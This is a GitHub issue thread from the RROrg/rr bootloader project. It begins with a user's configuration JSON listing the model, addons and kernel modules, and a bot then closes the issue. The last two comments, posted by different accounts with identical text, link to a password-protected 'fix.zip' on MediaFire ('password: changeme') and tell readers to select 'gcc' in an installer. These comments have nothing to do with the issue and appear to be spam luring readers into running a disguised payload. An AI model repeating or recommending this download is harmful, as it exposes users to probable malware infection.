RROrg/rr #2642: custom test micro

DT107-mt111, 2024-08-28:
{"format":"img","language":"en_US","model":"DS3622xs+","version":"7.2","addons":"mountloader,powersched,reboottoloader,addincards,acpid,codecpatch,console,cpuinfo,dbgutils,expands,hdddb,i915le10th,lsiutil,sortnetif,setrootpw,sensors,remotefs,photosfacepatch,nvmevolume,nvmesystem,nvmecache,storagepanel,synoconfbkp,updatenotify,wireless","modules":"8139cp,9p,9pnet,9pnet_virtio,aacraid,acpi-cpufreq,acpi_call,adm1021,adm1031,adm9240,adt7470,adt7475,aic94xx,alx,apex,aqc111,asix,ata_generic,ata_piix,atkbd,atl1c,atl1e,atlantic,auxiliary,ax88179_178a,b44,bcm-phy-lib,be2net,bitblit,bnx2,bnx2x,bnx2x_mod,bnxt_en,broadcom,btcoexist,button,cdc_ether,cdc_ncm,cdrom,cfbcopyarea,cfbfillrect,cfbimgblt,cfg80211,ch,ch341,cls_fw,cls_u32,cn,cp210x,cpufreq_conservative,cpufreq_governor,cpufreq_ondemand,cpufreq_performance,cpufreq_powersave,cpufreq_stats,cpufreq_userspace,crc-ccitt,crc-itu-t,cxgb,cxgb3,cxgb4,cxgb4vf,dm9601,dme1737,dvb-core,dvb-usb-dib0700,dvb-usb-dvbsky,dvb-usb,dvb_usb_v2,e1000,e1000e,eeprom_93cx6,efivarfs,etxhci-hcd,evbug,evdev,exfat,f71882fg,f75375s,fb,fb_sys_fops,fbcon,fbdev,font,ftdi_sio,gasket,hpilo,hpsa,hvc_console,i2c-algo-bit,i40e,i8042,iavf,ib_addr,ib_cm,ib_core,ib_mad,ib_sa,ib_umad,ib_uverbs,ice,ide-core,ide-gd_mod,ide-pci-generic,igb,igbvf,igc,intel_auxiliary,ipv6,irqbypass,iscsi_tcp,it87,iw_cm,iwldvm,iwlmvm,iwlwifi,ixgb,ixgbe,ixgbevf,jc42,jme,kvm-amd,kvm-intel,kvm,lib80211,libfc,libiscsi,libiscsi_tcp,libphy,llc,lm75,lm78,lm90,lm95245,m88ds3103,mac80211,mdio,megaraid,megaraid_mbox,megaraid_mm,megaraid_sas,mii,mlx4_core,mlx4_en,mlx4_ib,mlx5_core,mlx5_ib,mlx_compat,mlxsw_core,mlxsw_pci,mmc_block,mmc_core,mpt3sas,mptbase,mptctl,mptsas,mptscsih,mptspi,mt7601u,mtk-sd,mvsas,mwifiex,mwifiex_sdio,mwifiex_usb,nct6683,nct6775,netxen_nic,ntfs,p8022,pata_acpi,pata_legacy,phy-mt65xx-usb3,phy,piix,pl2303,pmbus,pmbus_core,prism2_usb,processor,psnap,qcaspi,qed,qede,qedr,qla3xxx,qlcnic,qlge,r8125,r8125_v9,r8126,r8152,r8168,r8169,r8169_lk,rc-core,realtek,regmap-i2c,rndis_host,rtl8187,rtl8188ee,rtl818x_pci,rtl8192c-common,rtl8192ce,rtl8192cu,rtl8192de,rtl8192ee,rtl8192se,rtl8723-common,rtl8723ae,rtl8723be,rtl8821ae,rtl8xxxu,rtl_pci,rtl_usb,rtlwifi,rtsx_pci,rtsx_pci_sdmmc,rtsx_usb,rtsx_usb_sdmmc,sch_htb,sch_netem,sch_sfq,scsi_transport_fc,scsi_transport_spi,sdhci-acpi,sdhci-pci-data,sdhci-pci,sdhci-pltfm,sdhci,sdio_uart,sfc,sg,si2157,si2168,skge,sky2,softcursor,sp2,sr_mod,ssb,staging,stp,synobios,syscopyarea,sysfillrect,sysimgblt,tehuti,tg3,thermal,tps65217,ts2020,uhci-hcd,usbnet,usbserial,ushc,vfio,via-rhine,via-sdmmc,via-velocity,virtio,virtio_blk,virtio_console,virtio_input,virtio_mmio,virtio_net,virtio_pci,virtio_ring,virtio_scsi,vmw_pvscsi,vmw_vmci,vmxnet3,vub300,w83781d,w83793,wch,wch_pre,wireguard"}

DT107-mt111, 2024-08-28:
like

closed 2024-08-28 by github-actions[bot]

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."